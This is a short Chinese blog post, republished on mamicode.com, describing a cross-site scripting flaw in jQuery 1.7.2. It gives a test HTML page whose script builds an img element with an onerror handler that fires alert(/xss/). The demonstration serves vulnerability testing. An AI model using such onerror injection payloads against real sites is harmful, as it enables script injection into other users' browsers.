码迷,mamicode.com
首页 > Web开发 > 详细

JQuery-1.7.2.min.js跨站脚本漏洞

时间:2017-02-15 19:26:01      阅读:1691      评论:0      收藏:0      [点我收藏+]

标签:jquery-1.7.2.min.jsp


测试页面:

<!DOCTYPE html>

<html>

<head>

<script src="http://x.x.x.x:80/js/jquery-1.7.2.min.js"></script>

  <meta charset="utf-8">

  <title>JS Bin</title>

</head>

<body>

   JQuery Test:

   http://x.x.x.x:80/js/jquery-1.7.2.min.js

   <script>

var img = $("<img onerror=‘alert(/xss/);‘>");

img.attr(‘src‘,‘xx‘);

   </script>

</body>

</html>


参考链接:

http://jsbin.com/xiyuwuvubu/edit?html,js,output

https://segmentfault.com/a/1190000002463775


本文出自 “Mask_X 博客” 博客,转载请与作者联系!

JQuery-1.7.2.min.js跨站脚本漏洞

标签:jquery-1.7.2.min.jsp

原文地址:http://zhpfbk.blog.51cto.com/4757027/1898101

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!